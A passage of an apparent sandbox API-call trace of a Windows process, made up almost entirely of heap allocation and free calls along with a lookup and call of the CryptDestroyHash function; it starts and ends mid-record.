[0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0188.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0188.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0188.476] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0188.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3f0 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba1b0 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3a8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0188.478] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0188.478] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0188.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0188.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d460 [0188.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d460, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0188.480] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0188.480] CryptDestroyHash (hHash=0x90af58) returned 1 [0188.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0188.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0188.483] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0188.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0188.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0188.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0188.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: 